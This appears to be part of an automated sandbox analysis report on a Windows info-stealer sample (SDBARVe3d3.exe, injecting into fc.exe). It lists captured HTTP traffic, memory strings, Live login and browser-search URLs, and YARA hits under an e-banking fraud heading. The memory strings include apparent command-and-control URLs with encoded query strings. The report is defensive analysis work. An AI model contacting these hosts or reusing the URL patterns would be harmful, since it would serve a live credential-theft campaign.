                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:55:02 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 15115 Content-Type: text/html; charset=UTF-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:55:05 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 15115 Content-Type: text/html; charset=UTF-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:55:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pF8gyx8BgWQvl6njJX8RtKkdzdNWi8UJOfjKSfQK3evL9M9XZyETjwUCNpeSOxxdeF3BTuNzo5fUWN7AoDJUnfay7yTRcRC4hAK0rKn2cc2jhq%2BgwIUWWgZvFftDAC2Goi4T7oE7Uw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded22b86aa40c17-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1261&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=606&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:55:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRFEoabB8Hv3riI7m0DsKcR5gvkEiEgVoAf%2FpMxfp1%2BP9pPaSOgu8SnIiR5Ikm0pat40sACAGJ6tUZffhpPaa9Jum4uuYXm1nTeASd6y%2FVlYHcRxZQ2DBG0juZl%2FnYoOVwy0SCzVbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded22c8b82447af-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=626&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:55:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULdGMbCLzBB8DifIneHL5xWL6ghBSLJQnVmV%2FcPIF81TcLeayqHEbckrdbLEpsaeQvxZr3XPJrAqrEoF%2B363%2F7Hved3arWUZ2NVpo1YQOCrE%2FwB6I4FS8xMBem3L4e1Z%2BJx3xO76Jg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded22d90b228789-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1257&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10708&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:55:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u16ROvnUPrlzsorWDte7SiCsVBtaHpQDr%2FqD7s4Rm28Sb3Dw95aI%2FD2IbGTCBWV4UJffXhS9XYizULmnZDhcEWiIJUNmu19uRm7oaDRrPkJmW1a1NEZ0Z8%2F4c%2F8GV6feRrUu8iK5TA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded22e8e9d07d5d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=338&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 583<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Thu, 07 Nov 2024 11:56:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGkzJSlWz5J7rARLMDU4NJmweb%2FGo0YWkHjb%2BTkMmVWpyn%2FPkYSmm2MfS6Fqzb7Jw6UQYb%2B77WNI6pNIfx9OS0obF9pQcbFOtGUufDztJE31qr%2BSrjzD7jqyZFaskXV7AywM7DSmUWk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded236219e7e91a-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=609&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Thu, 07 Nov 2024 11:56:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iqP8vLcSVEuO36QxxgDOsWNPw5LI%2Bg1jkahbvmWtM7Pt0ptLM51fVUjjwaWbDmaTjc3KnD1UEaktQEXcsNGwf7qdqieS59bAjOGSb2A0QIE3%2FfeHIw%2BA%2B6hJNVrUDH49jNdB3qpJTxo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded2374b8b28d26-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=629&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: fc.exe, 00000007.00000002.4135576349.0000000004B58000.00000004.10000000.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.0000000003F48000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://papampalli.shop/pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VF
                Source: wPGxKDFwovcH.exe, 00000008.00000002.4134949822.00000000043FE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://pip1-loh.com/
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: wPGxKDFwovcH.exe, 00000008.00000002.4136828393.000000000504D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.gokulmohan.online
                Source: wPGxKDFwovcH.exe, 00000008.00000002.4136828393.000000000504D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.gokulmohan.online/ut59/
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: fc.exe, 00000007.00000003.2288824428.0000000007B7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: fc.exe, 00000007.00000002.4135576349.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.00000000035DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ultrawin23.shop/53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9

                E-Banking Fraud

                Source: Yara match, File source: 2.2.SDBARVe3d3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.SDBARVe3d3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176516C2_2_0176516C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173B1B02_2_0173B1B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E70E92_2_017E70E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EF0E02_2_017EF0E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DF0CC2_2_017DF0CC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017370C02_2_017370C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171D34C2_2_0171D34C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E132D2_2_017E132D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0177739A2_2_0177739A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174D2F02_2_0174D2F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D12ED2_2_017D12ED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174B2C02_2_0174B2C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017352A02_2_017352A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E75712_2_017E7571
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CD5B02_2_017CD5B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017214602_2_01721460
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EF43F2_2_017EF43F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EF7B02_2_017EF7B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017756302_2_01775630
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E16CC2_2_017E16CC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017399502_2_01739950
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174B9502_2_0174B950
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C59102_2_017C5910
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179D8002_2_0179D800
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017338E02_2_017338E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFB762_2_017EFB76
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A5BF02_2_017A5BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176DBF92_2_0176DBF9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174FB802_2_0174FB80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A3A6C2_2_017A3A6C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EFA492_2_017EFA49
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E7A462_2_017E7A46
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DDAC62_2_017DDAC6
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CDAAC2_2_017CDAAC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01775AA02_2_01775AA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D1AA32_2_017D1AA3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E7D732_2_017E7D73
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E1D5A2_2_017E1D5A
